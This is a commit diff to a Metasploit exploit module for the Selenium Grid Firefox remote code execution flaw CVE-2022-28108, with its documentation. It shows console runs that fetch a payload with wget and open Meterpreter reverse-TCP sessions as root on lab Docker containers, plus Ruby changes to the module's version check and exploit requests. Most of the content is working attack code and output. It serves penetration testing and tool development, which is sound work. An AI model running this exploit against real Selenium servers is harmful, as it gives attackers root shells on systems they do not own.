Apply suggestions from rapid7#19769

Author: Takahiro-Yoko

documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md

@@ -65,7 +65,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
    ----                ---------------  --------  -----------
    FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
    FETCH_DELETE        true             yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      QqkwqZES         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      NnnZmAGfjJoa     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -88,12 +88,14 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:47990) at 2024-12-30 12:46:43 +0900
+[*] Started session (3191e005-977b-40c9-8c70-7e2f4ef4f922).
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:43182) at 2025-01-04 10:01:09 +0900
+[*] Failed to delete the session (3191e005-977b-40c9-8c70-7e2f4ef4f922). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.3
+Computer     : 172.17.0.2
 OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
@@ -107,12 +109,14 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
-[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:33048) at 2024-12-30 12:48:53 +0900
+[*] Started session (dc849fa9-0b61-4862-8766-21f1cb47c827).
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:54410) at 2025-01-04 10:03:37 +0900
+[*] Failed to delete the session (dc849fa9-0b61-4862-8766-21f1cb47c827). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.4
+Computer     : 172.17.0.3
 OS           : Ubuntu 18.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
@@ -122,16 +126,18 @@ meterpreter >
 
 ### selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
 ```
-msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4448
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
-[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.16:43864) at 2024-12-30 12:58:33 +0900
+[*] Started session (af8d64bc-cdf6-4a03-8706-e90bddbee1c2).
+[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.16:40680) at 2025-01-04 10:05:44 +0900
+[*] Failed to delete the session (af8d64bc-cdf6-4a03-8706-e90bddbee1c2). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.2
+Computer     : 172.17.0.4
 OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
@@ -141,16 +147,18 @@ meterpreter >
 
 ### selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
 ```
-msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4449
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4448
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:60066) at 2025-01-02 09:29:36 +0900
+[*] Started session (1657b5ac-c514-431f-8c83-761c14012869).
+[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.16:44868) at 2025-01-04 10:10:38 +0900
+[*] Failed to delete the session (1657b5ac-c514-431f-8c83-761c14012869). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.2
+Computer     : 172.17.0.5
 OS           : Ubuntu 24.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl

modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb

@@ -30,9 +30,7 @@ def initialize(info = {})
           ['URL', 'https://github.com/JonStratton/selenium-node-takeover-kit/tree/master'],
           ['EDB', '49915'],
         ],
-        'Payload' => {
-          'DisableNops' => true
-        },
+        'Payload' => {},
         'Platform' => %w[linux],
         'Targets' => [
           [
@@ -66,33 +64,39 @@ def initialize(info = {})
   end
 
   def check
-    res = send_request_cgi({
+    # Request for Selenium Grid version 3
+    v3res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path)
     })
-    if res&.code != 200
-      res = send_request_cgi({
+    if v3res&.code != 200
+      # Request for Selenium Grid version 4
+      v4res = send_request_cgi({
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path, 'status')
       })
-      if res && res.get_json_document && res.get_json_document.include?('value') &&
-         res.get_json_document['value'].include?('message')
-        if res.get_json_document['value']['message'] == 'Selenium Grid ready.'
+      if v4res && v4res.get_json_document && v4res.get_json_document.include?('value') &&
+         v4res.get_json_document['value'].include?('message')
+        if v4res.get_json_document['value']['message'] == 'Selenium Grid ready.'
           return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected and ready.')
-        elsif res.get_json_document['value']['message'].downcase.include?('selenium grid')
+        elsif v4res.get_json_document['value']['message'].downcase.include?('selenium grid')
           return Exploit::CheckCode::Unknown('Selenium Grid version 4.x detected but not ready.')
         end
       end
 
-      return Exploit::CheckCode::Unknown
+      return Exploit::CheckCode::Unknown('Unexpected server reply.')
     end
 
-    js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
-    return Exploit::CheckCode::Unknown unless js_code
+    js_code = v3res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
+    return Exploit::CheckCode::Unknown('Unable to determine the version.') unless js_code
 
     json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
-    json_data = JSON.parse(json_str)
-    return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version']
+    begin
+      json_data = JSON.parse(json_str)
+    rescue JSON::ParserError
+      return Exploit::CheckCode::Unknown('Unable to determine the version.')
+    end
+    return Exploit::CheckCode::Unknown('Unable to determine the version.') unless json_data && json_data.include?('version') && json_data['version']
 
     # Extract the version
     version = Rex::Version.new(json_data['version'])
@@ -138,7 +142,7 @@ def exploit
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
       'data' => new_session
     }, datastore['TIMEOUT'])
-    fail_with(Failure::Unknown, 'Connection failed.') unless res
+    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
 
     session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
     fail_with(Failure::Unknown, 'Failed to start session.') unless session_id
@@ -163,6 +167,7 @@ def exploit
     })
     # The server does not send a response, so no check here
 
+    # This may take some time (about 5 minutes or so), so no timeout is set here.
     res = send_request_cgi({
       'method' => 'DELETE',
       'uri' => normalize_uri(target_uri.path, @version3 ? "wd/hub/session/#{session_id}" : "session/#{session_id}"),